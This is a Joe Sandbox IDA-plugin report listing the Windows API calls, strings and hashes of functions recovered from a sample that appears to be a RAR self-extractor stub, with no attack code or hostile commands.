                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,002A0481,?,00000000,?,00000001,?,?,00000001,002A0481,?), ref: 002A3685
                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 002A370E
                                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,0029DBD1,?), ref: 002A3720
                                        • __freea.LIBCMT ref: 002A3729
                                          • Part of subcall function 002A040E: RtlAllocateHeap.NTDLL(00000000,0029535E,?,?,00296C16,?,?,?,?,?,00295269,0029535E,?,?,?,?), ref: 002A0440
                                        Similarity
                                        • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                        • String ID:
                                        • API String ID: 2652629310-0
                                        • Opcode ID: 7e46c24878a9d93a2aae51f673c1f6b1e4b71e88443c973e6df44efc94f7dab5
                                        • Instruction ID: f0f37b15eaadde86728f9e653958311b86562ae6b856e630f4da1a44336a1a3b
                                        • Opcode Fuzzy Hash: 7e46c24878a9d93a2aae51f673c1f6b1e4b71e88443c973e6df44efc94f7dab5
                                        • Instruction Fuzzy Hash: 5C31A0B1A2020AABDF25DF64DC85DAEBBE9EB45750F140169FC04D6250EB35CE60CB90
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 00281273
                                          • Part of subcall function 0028067E: GetVersionExW.KERNEL32(?), ref: 002806AF
                                        • FoldStringW.KERNEL32(00000020,?,000000FF,00000000,00000000,0000000C,0027350C,D946ACBC,00000000,?,?,002743F5,?,?,?,00000000), ref: 0028129A
                                        • FoldStringW.KERNEL32(00000020,?,000000FF,?,?,00000000), ref: 002812D4
                                        • _wcslen.LIBCMT ref: 002812DF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                         • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: FoldString$H_prolog3Version_wcslen
                                        • String ID:
                                        • API String ID: 535866816-0
                                        • Opcode ID: ea20e61e7b3a7a57264a3f68e5e5f36328efba13b53ade9c73327ac57649de58
                                        • Instruction ID: bcfc0ca59766f9bb0367e87ecac8957b616c0d5466a3dc0878c5d2ab34bc4000
                                        • Opcode Fuzzy Hash: ea20e61e7b3a7a57264a3f68e5e5f36328efba13b53ade9c73327ac57649de58
                                        • Instruction Fuzzy Hash: E2119471A22126ABDB01AFA98D49A6F7B6DAF05720F200205B810E72C1CB309971CBF1
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 002862D4
                                        • ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,?,?,?,?,?,00000010), ref: 002862EB
                                        • ExpandEnvironmentStringsW.KERNEL32(?,?,?,00000000,?,?,?,?,?,00000010), ref: 00286328
                                        • _wcslen.LIBCMT ref: 00286338
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                         • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: EnvironmentExpandStrings$H_prolog3_wcslen
                                        • String ID:
                                        • API String ID: 3741103063-0
                                        • Opcode ID: be43d1155240f42b5fdbd03c46020c6a1d59a2fb09f1e928b987beca49423af3
                                        • Instruction ID: ebdbcbae695ba8a62c1f024c54a611a675ee0125ca017928d6dc77ac64701013
                                        • Opcode Fuzzy Hash: be43d1155240f42b5fdbd03c46020c6a1d59a2fb09f1e928b987beca49423af3
                                        • Instruction Fuzzy Hash: 6811A074A2221AAF9F00AFA89D899BFF779BF45714714415DB411A7280DB34AE20CBA4
                                        APIs
                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,002A198B,00000000,00000000,00000000,00000000,?,002A1B88,00000006,FlsSetValue), ref: 002A1A16
                                        • GetLastError.KERNEL32(?,002A198B,00000000,00000000,00000000,00000000,?,002A1B88,00000006,FlsSetValue,002B0DD0,FlsSetValue,00000000,00000364,?,002A00D7), ref: 002A1A22
                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,002A198B,00000000,00000000,00000000,00000000,?,002A1B88,00000006,FlsSetValue,002B0DD0,FlsSetValue,00000000), ref: 002A1A30
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                         • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: LibraryLoad$ErrorLast
                                        • String ID:
                                        • API String ID: 3177248105-0
                                        • Opcode ID: 8167a16c6576258445c03afbb4d45a8ddef4842318f77f090e52aafd5443e7dd
                                        • Instruction ID: ce2990beaf76a0993d09753b8b4e886e909df0810eeeec5ffea43342d0b7e83c
                                        • Opcode Fuzzy Hash: 8167a16c6576258445c03afbb4d45a8ddef4842318f77f090e52aafd5443e7dd
                                        • Instruction Fuzzy Hash: AA01F7366662239BC7218EA8AC48A57779CAF077B1F254620FD0AD3242CF20D830C6E0
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 00281310
                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000,0000000C,002817FB,?,?,\\?\,D946AC94,?,?,?,00000000,002AA279,000000FF), ref: 00281319
                                        • GetCurrentDirectoryW.KERNEL32(?,?,00000000,?,?,?,00000000,002AA279,000000FF), ref: 00281348
                                        • _wcslen.LIBCMT ref: 00281351
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                         • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: CurrentDirectory$H_prolog3_wcslen
                                        • String ID:
                                        • API String ID: 19219720-0
                                        • Opcode ID: 05ca42ff9b440ebe14d8e76cde77f6a44022fc956b293405aa374dba201e56b8
                                        • Instruction ID: 1ea53ceddc621a09d8798e65299c06e179e34920535aa696cb88ed48a3da1d74
                                        • Opcode Fuzzy Hash: 05ca42ff9b440ebe14d8e76cde77f6a44022fc956b293405aa374dba201e56b8
                                        • Instruction Fuzzy Hash: 9A01DB75D20126BB8B10AFF89D058BFBB7DAF86710B104609F515E7281CF348921CBE0
                                        APIs
                                        • GetDC.USER32(00000000), ref: 0028EB77
                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 0028EB86
                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0028EB94
                                        • ReleaseDC.USER32(00000000,00000000), ref: 0028EBA2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                         • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: CapsDevice$Release
                                        • String ID:
                                        • API String ID: 1035833867-0
                                        • Opcode ID: 8350f8df71bdf71e04ebe2c7ed726d60cee94c7ec0fb675a2d6780174e9a8d44
                                        • Instruction ID: a42e29e95c674e2ea4e470583def374be1cd4433272617051e2c795131c80f72
                                        • Opcode Fuzzy Hash: 8350f8df71bdf71e04ebe2c7ed726d60cee94c7ec0fb675a2d6780174e9a8d44
                                        • Instruction Fuzzy Hash: A7E0123194AF70ABD7211B71BD0DF873E54AF19B53F050181FB05AA1D0CAB084408FD0
                                        APIs
                                        • __Init_thread_footer.LIBCMT ref: 00288294
                                          • Part of subcall function 002714A7: _wcslen.LIBCMT ref: 002714B8
                                          • Part of subcall function 0029087E: __EH_prolog3_GS.LIBCMT ref: 00290885
                                          • Part of subcall function 0029087E: GetLastError.KERNEL32(0000001C,00288244,?,00000000,00000086,?,D946AC94,?,?,?,?,?,00000000,002AA75D,000000FF), ref: 0029089D
                                          • Part of subcall function 0029087E: SetLastError.KERNEL32(00000000,?,?,?,?,?,?,?,00000000,002AA75D,000000FF), ref: 002908D6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                         • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: ErrorLast$H_prolog3_Init_thread_footer_wcslen
                                        • String ID: %ls
                                        • API String ID: 1279724102-3246610740
                                        • Opcode ID: 3132d95d8145615e89fa90c8711a5ca7bb59f9440af6f5263d7d75672cba28b7
                                        • Instruction ID: 5f111fc64bfade45bbac1b801c1c612a5edde86e3743fe6b18f0ef7f12e8966a
                                        • Opcode Fuzzy Hash: 3132d95d8145615e89fa90c8711a5ca7bb59f9440af6f5263d7d75672cba28b7
                                        • Instruction Fuzzy Hash: 28B19F34825209EBDB24FF54CD56EAE7BB5BF15304F208419F846261E1DBB1AA74EF80
                                        APIs
                                          • Part of subcall function 002A246B: GetOEMCP.KERNEL32(00000000,?,?,002A26F4,?), ref: 002A2496
                                        • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,002A2739,?,00000000), ref: 002A2914
                                        • GetCPInfo.KERNEL32(00000000,9'*,?,?,?,002A2739,?,00000000), ref: 002A2927
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                         • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: CodeInfoPageValid
                                        • String ID: 9'*
                                        • API String ID: 546120528-3582295230
                                        • Opcode ID: 6077cd9c64cafb54c737221056a0b0188009a07d195c3377ffb59000122c051f
                                        • Instruction ID: e198f761580667a4354117987af403d9a251463ab66c180574954177f9ae0c88
                                        • Opcode Fuzzy Hash: 6077cd9c64cafb54c737221056a0b0188009a07d195c3377ffb59000122c051f
                                        • Instruction Fuzzy Hash: C5512570A20343DFDB25CF39C8416BBFBE5EF42700F24406ED09687252DA35999ACB90
                                        APIs
                                        • GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 002A2568
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                         • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: Info
                                        • String ID: $}**
                                        • API String ID: 1807457897-3226082957
                                        • Opcode ID: c851cd05edc7bf4b50b93ce8bc53647e69e39fd3f298d3ec974a46e38c8fa4e7
                                        • Instruction ID: f8384498bb5d11b7c115207f2a2164163438c494ce469455d569ffa874c67ed4
                                        • Opcode Fuzzy Hash: c851cd05edc7bf4b50b93ce8bc53647e69e39fd3f298d3ec974a46e38c8fa4e7
                                        • Instruction Fuzzy Hash: 2F413B70915248DFDF268E28CC84BF6BBEDEB46704F1404ECE58A86142D6359A69CF60
                                        APIs
                                          • Part of subcall function 002879F7: GetSystemTime.KERNEL32(?,00000000), ref: 00287A0F
                                          • Part of subcall function 002879F7: SystemTimeToFileTime.KERNEL32(?,?), ref: 00287A1D
                                          • Part of subcall function 002879A0: __aulldiv.LIBCMT ref: 002879A9
                                        • __aulldiv.LIBCMT ref: 0027F162
                                        • GetCurrentProcessId.KERNEL32(00000000,?,000186A0,00000000,D946AC94,?,?,00000000,?,00000000,002A9F3D,000000FF), ref: 0027F169
                                          • Part of subcall function 00271150: _wcslen.LIBCMT ref: 0027115B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                         • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: Time$System__aulldiv$CurrentFileProcess_wcslen
                                        • String ID: .rartemp
                                        • API String ID: 3789791499-2558811017
                                        • Opcode ID: 102b6688540c45ba751a596345df6cb1c83b40f2e3a93a06b7f6aa3ab1086800
                                        • Instruction ID: ee1f83fc3b31ead917be12e7bc7f3a3b54aab6694229daf106d0dc9dc71b30e8
                                        • Opcode Fuzzy Hash: 102b6688540c45ba751a596345df6cb1c83b40f2e3a93a06b7f6aa3ab1086800
                                        • Instruction Fuzzy Hash: B2418371920249ABDF14EF64CC45EEEB7B8EF54310F508169F91993282EB349B68CF60
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 0028DAD5
                                          • Part of subcall function 00280360: __EH_prolog3.LIBCMT ref: 00280367
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                         • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: H_prolog3
                                        • String ID: Shell.Explorer$about:blank
                                        • API String ID: 431132790-874089819
                                        • Opcode ID: 689fee82622843cd6b434b9f823e688f5bf7fbb93d7d6135a1f6b29a49a372a4
                                        • Instruction ID: cec248d37ca8f9bfa044ca5a85a118f7d0feb1de00a4bc692f5be0a8a88591ef
                                        • Opcode Fuzzy Hash: 689fee82622843cd6b434b9f823e688f5bf7fbb93d7d6135a1f6b29a49a372a4
                                        • Instruction Fuzzy Hash: 08417E786212028FDF48EFA4D895B6A77B1BF89704F15806DE8069B2D2DF70AD14CF50
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 0028D7F2
                                        • ShowWindow.USER32(?,00000005), ref: 0028D8E8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                         • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: H_prolog3_ShowWindow
                                        • String ID: qI)
                                        • API String ID: 4203566401-3380328277
                                        • Opcode ID: f1a82f4a5c693c4f08198405dbb3c7055b29cf63feab24938cc95ae323e9f2ce
                                        • Instruction ID: f59db453b2d169e650ba7ece24bf6295329c5aefefae96c3ba0a18c471902cd0
                                        • Opcode Fuzzy Hash: f1a82f4a5c693c4f08198405dbb3c7055b29cf63feab24938cc95ae323e9f2ce
                                        • Instruction Fuzzy Hash: FC414F35A21629AFDB05EFA4DC88E9DBBB5FF0D310B044018F905A72A0DB71AD25CF90
                                        APIs
                                          • Part of subcall function 00271E44: GetDlgItem.USER32(00000000,00003021), ref: 00271E88
                                          • Part of subcall function 00271E44: SetWindowTextW.USER32(00000000,002AC6C8), ref: 00271E9E
                                        • EndDialog.USER32(?,00000001), ref: 0029017B
                                        • SetDlgItemTextW.USER32(?,00000067,?), ref: 002901B9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                         • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: ItemText$DialogWindow
                                        • String ID: GETPASSWORD1
                                        • API String ID: 445417207-3292211884
                                        • Opcode ID: fe655c0e678b7c8270d9c6b9fc92df68faf00ade9c5025210a39927561cf51e8
                                        • Instruction ID: 7d7a8be80a02ba412ca0f9de26f3cda32c4db7094f7199ba15dba7809704b2cf
                                        • Opcode Fuzzy Hash: fe655c0e678b7c8270d9c6b9fc92df68faf00ade9c5025210a39927561cf51e8
                                        • Instruction Fuzzy Hash: E21108B26643197FDA209F289C89FFB77ACEB85700F000429F74DA3180C770A8518B76
                                        APIs
                                          • Part of subcall function 00285094: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 002850B3
                                          • Part of subcall function 00285094: GetProcAddress.KERNEL32(002C51F8,CryptUnprotectMemory), ref: 002850C3
                                        • GetCurrentProcessId.KERNEL32(?,00000200,?,00285104), ref: 00285197
                                        Strings
                                        • CryptUnprotectMemory failed, xrefs: 0028518F
                                        • CryptProtectMemory failed, xrefs: 0028514E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                         • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AddressProc$CurrentProcess
                                        • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                        • API String ID: 2190909847-396321323
                                        • Opcode ID: cade798766e128f647dcfabf83e75b7bfbfda83c437b2537b91e3359f62deb49
                                        • Instruction ID: cb778de9da51d875ccbdd5a8c9536f29d8b55b27e1329be077cbec0e15b7256e
                                        • Opcode Fuzzy Hash: cade798766e128f647dcfabf83e75b7bfbfda83c437b2537b91e3359f62deb49
                                        • Instruction Fuzzy Hash: D5110335A22E35ABDB11BF24EC08B6E3B69AF41760B108115FC095B2C1DB70AD618BD5
                                        APIs
                                        • GetCurrentProcess.KERNEL32(00020008,?), ref: 0028FEB6
                                        • GetLastError.KERNEL32 ref: 0028FEE1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                         • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: CurrentErrorLastProcess
                                        • String ID: $L)
                                        • API String ID: 335030130-3732647755
                                        • Opcode ID: 694ad49962ea7077518beb83564596132c44e08b988726e20a322b0c870068b9
                                        • Instruction ID: 7cee594843a5bbcb202ddf389c3fb7b5f3cd20d0b8d52f1fd7e80e6468f5bbed
                                        • Opcode Fuzzy Hash: 694ad49962ea7077518beb83564596132c44e08b988726e20a322b0c870068b9
                                        • Instruction Fuzzy Hash: 69012976555209BFDF11AFA0AD89EEE7B6DEB1A350F100065F601D20A0EB718E50AB64
                                        APIs
                                        • IsWindowVisible.USER32(00010414), ref: 00294291
                                        • DialogBoxParamW.USER32(GETPASSWORD1,00010414,00290110,?), ref: 002942BA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: DialogParamVisibleWindow
                                        • String ID: GETPASSWORD1
                                        • API String ID: 3157717868-3292211884
                                        • Opcode ID: f5f4dcddaf965544eb3fe823c249fbc663f0399e4a4968ae65071d42d4ec6278
                                        • Instruction ID: 04e7e1d4bca2481698ddf370d820876b9e88dd8d8641cba1b8a53bb392f9a88a
                                        • Opcode Fuzzy Hash: f5f4dcddaf965544eb3fe823c249fbc663f0399e4a4968ae65071d42d4ec6278
                                        • Instruction Fuzzy Hash: D801D6306B5765ABCF10BF64AC0EF6637C8BB02300B458255FC0593191CAB0A8B1CF61
                                        APIs
                                        • WaitForSingleObject.KERNEL32(?,000000FF,0028770A,?,?,0028777F,?,?,?,?,?,00287769), ref: 002875F3
                                        • GetLastError.KERNEL32(?,?,0028777F,?,?,?,?,?,00287769), ref: 002875FF
                                          • Part of subcall function 002792EB: __EH_prolog3_GS.LIBCMT ref: 002792F2
                                        Strings
                                        • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00287608
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: ErrorH_prolog3_LastObjectSingleWait
                                        • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                        • API String ID: 2419225763-2248577382
                                        • Opcode ID: cf797f9a8f8e8646af755367ab4af089ff6813c431f7a23c376b79a71120858a
                                        • Instruction ID: e0575d1e5511218f25d4dba57623fcb1dad1fe341455977f2d17b403430cc7f8
                                        • Opcode Fuzzy Hash: cf797f9a8f8e8646af755367ab4af089ff6813c431f7a23c376b79a71120858a
                                        • Instruction Fuzzy Hash: 73D05E3152D931B7D91037686C0ECEE390D9B23730F714754FA39652E6DE2008A146AD
                                        APIs
                                        • GetModuleHandleW.KERNEL32(00000000,?,00000000,?,00000000,00200000,?,?,00000000,0000005C,D946AC94), ref: 00283E65
                                        • FindResourceW.KERNEL32(00000000,RTL,00000005), ref: 00283E73
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
